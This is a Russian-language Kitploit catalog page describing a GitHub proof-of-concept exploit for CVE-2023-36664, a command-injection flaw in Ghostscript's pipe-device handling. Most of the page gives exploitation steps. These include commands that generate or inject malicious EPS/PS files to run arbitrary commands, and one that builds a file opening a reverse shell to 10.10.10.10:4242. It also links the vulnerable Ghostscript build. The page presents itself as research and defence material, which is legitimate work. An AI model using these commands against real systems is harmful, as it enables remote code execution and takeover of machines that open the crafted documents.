Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-36664-Ghostscript-command-injection — PoC уязвимости внедрения команд в Ghostscript (CVE-2023-36664) | Kitploit
Инструменты/GitHubGitHub/jakabakos/cve-2023-36664-ghostscript-command-injection
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияСтатьи и ИсследованияОбучение и Образование
GitHubjakabakos/cve-2023-36664-ghostscript-command-injection

CVE-2023-36664-Ghostscript-command-injection

PoC уязвимости внедрения команд в Ghostscript (CVE-2023-36664)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
130162 лет назадПроверено Kitploit

PoC уязвимости внедрения команд в Ghostscript (CVE-2023-36664)

Уязвимость, раскрытая в Ghostscript версии ниже 10.01.2, приводит к выполнению кода (оценка CVSS 9.8).

Официальное описание уязвимости:

Artifex Ghostscript до версии 10.01.2 некорректно обрабатывает проверку разрешений для pipe-устройств (с префиксом %pipe% или символом |).

Debian выпустил бюллетень безопасности, в котором упоминается возможность выполнения произвольных команд:

"Было обнаружено, что Ghostscript, интерпретатор PostScript/PDF под лицензией GPL, некорректно обрабатывает проверку разрешений для pipe-устройств, что может привести к выполнению произвольных команд при обработке повреждённых файлов документов."

Репозиторий создан для публикации анализа CVE в блоге vsociety blog.

Эксплуатация

Скачать Ghostscript 10.01.1 здесь: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 Прямая ссылка на исполняемый файл для Windows x64: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

Эксплуатация может произойти при открытии PS или EPS файла и может привести к выполнению кода из-за неправильной обработки проверки разрешений для pipe-устройств в Ghostscript.

Использование: python3 CVE_2023_36664_exploit.py <input_file> <command>

Пример:

root@kitploit:~
python3 CVE_2023_36664_exploit.py file.eps "calc"

Это создаёт новый файл с именем file_injected.eps.

Откройте его с помощью Ghostscript, чтобы запустить калькулятор (начиная с версии 9.50 также нужно использовать опцию -dNOSAFER):

root@kitploit:~
gs10011w64.exe -dNOSAFER .\file_injected.eps
доказательство

Другие примеры: Создать новый EPS файл с именем run_calculator.eps с полезной нагрузкой "calc" (открывает новый калькулятор в Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

Создать новый EPS файл с именем rev_shell.eps с пользовательским IP (запускает обратную оболочку при срабатывании в Unix)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

Создать новый PS файл malicius.ps с полезной нагрузкой "calc" (открывает новый калькулятор в Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

Внедрить вредоносную пользовательскую полезную нагрузку ("calc") в существующий файл file.eps (открывает новый калькулятор в Windows)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

Отказ от ответственности

Данное программное обеспечение создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для использования для атак на системы, за исключением случаев, когда это явно разрешено. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент